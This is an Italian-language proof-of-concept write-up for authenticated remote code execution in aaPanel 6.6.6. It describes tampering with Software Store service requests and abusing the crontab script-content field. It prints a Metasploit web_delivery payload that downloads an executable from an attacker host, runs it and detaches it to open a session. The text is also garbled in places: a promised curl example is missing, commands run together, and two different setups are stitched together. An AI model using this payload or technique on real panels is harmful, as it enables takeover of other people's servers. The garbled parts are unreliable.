
aapanel 6.6.6 - Esecuzione di codice in remoto (autenticata)
Per realizzare questo PoC, ho semplicemente installato il software usando docker-compose
Vai al Software Store, clicca su qualsiasi riga del campo impostazioni, intercetta la richiesta quando clicchi su "start/stop/restart" e modifica/edita la richiesta per eseguire ciò che vuoi. Ecco un esempio con curl :
Per realizzare questo PoC, ho installato una versione pulita di Ubuntu 20.04, poi ho installato + ed eseguito questo script
wgetsudowget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.shPrima di tutto, configura le opzioni di web_delivery; questo creerà un payload e un listener.

Ora eseguilo

questo genererà il seguente payload:
wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown
Quindi copia/incolla così nella sezione script content del menu crontab in aapanel.

Ora esegui il tuo crontab e attendi la tua sessione.

Basta eseguire msfconsole -r aapanel.rc copia/incolla il payload nella sezione script content e goditi la tua sessione.